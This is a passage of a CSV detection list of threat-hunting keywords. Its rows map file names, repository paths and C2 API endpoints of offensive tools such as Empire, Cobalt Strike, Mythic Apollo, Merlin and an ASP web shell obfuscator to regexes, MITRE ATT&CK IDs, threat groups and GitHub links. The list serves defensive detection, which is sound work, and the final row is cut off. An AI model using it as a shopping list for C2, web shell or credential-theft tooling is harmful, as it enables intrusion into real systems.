"*/api/reporting/msg/*?token=*",".{0,1000}\/api\/reporting\/msg\/.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - 
T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/reporting/type/checkin?token=*",".{0,1000}\/api\/reporting\/type\/checkin\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" 
"*/api/stagers/dll?token=*",".{0,1000}\/api\/stagers\/dll\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/stagers?token=*",".{0,1000}\/api\/stagers\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - 
T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/users/1/disable?token=*",".{0,1000}\/api\/users\/1\/disable\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/v1/campaign/*/implants/*",".{0,1000}\/api\/v1\/campaign\/.{0,1000}\/implants\/.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/api/v1/implants/*/execute*",".{0,1000}\/api\/v1\/implants\/.{0,1000}\/execute.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/api/v1/implants/*/responses*",".{0,1000}\/api\/v1\/implants\/.{0,1000}\/responses.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/api/v2/starkiller*",".{0,1000}\/api\/v2\/starkiller.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 
- T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api_hooking.exe*",".{0,1000}\/api_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/api0cradle/CVE-*",".{0,1000}\/api0cradle\/CVE\-.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","338","62","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "*/Apollo.exe*",".{0,1000}\/Apollo\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/Apollo.git*",".{0,1000}\/Apollo\.git.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/Apollo/Agent/*",".{0,1000}\/Apollo\/Agent\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/ApolloInterop.*",".{0,1000}\/ApolloInterop\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/ApolloInterop/*",".{0,1000}\/ApolloInterop\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/apollon-all-x64*",".{0,1000}\/apollon\-all\-x64.{0,1000}","offensive_tool_keyword","apollon","evade 
auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*/apollon-main.zip*",".{0,1000}\/apollon\-main\.zip.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*/apollon-selective-x64*",".{0,1000}\/apollon\-selective\-x64.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*/ApolloTest.exe",".{0,1000}\/ApolloTest\.exe","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/app/bin/merlinAgent*",".{0,1000}\/app\/bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/aquasecurity/cloudsploit*",".{0,1000}\/aquasecurity\/cloudsploit.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua - Cloud Security Scans","T1526 - T1534 - T1547 - T1078 - 
T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*/Ares.git",".{0,1000}\/Ares\.git","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*/ares.py *",".{0,1000}\/ares\.py\s.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*/args_spoofing-rs.exe*",".{0,1000}\/args_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/armitage.git*",".{0,1000}\/armitage\.git.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*/arp_scanner.*",".{0,1000}\/arp_scanner\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/arp_spoof/*",".{0,1000}\/arp_spoof\/.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/arsenal.git*",".{0,1000}\/arsenal\.git.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/arsenal-1.1.0.zip*",".{0,1000}\/arsenal\-1\.1\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking 
programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/arsenal-1.2.0.zip*",".{0,1000}\/arsenal\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/arsenal-1.2.1.zip*",".{0,1000}\/arsenal\-1\.2\.1\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/arsenal-master.zip*",".{0,1000}\/arsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/artifactor.py*",".{0,1000}\/artifactor\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/ase_docker/*",".{0,1000}\/ase_docker\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/Ask4Creds.ps1*",".{0,1000}\/Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/asn-query.nse*",".{0,1000}\/asn\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ASPJinjaObfuscator.git*",".{0,1000}\/ASPJinjaObfuscator\.git.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*/asprox.profile*",".{0,1000}\/asprox\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" 
"*/asprox.profile*",".{0,1000}\/asprox\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/ASRenum.cpp*",".{0,1000}\/ASRenum\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. 
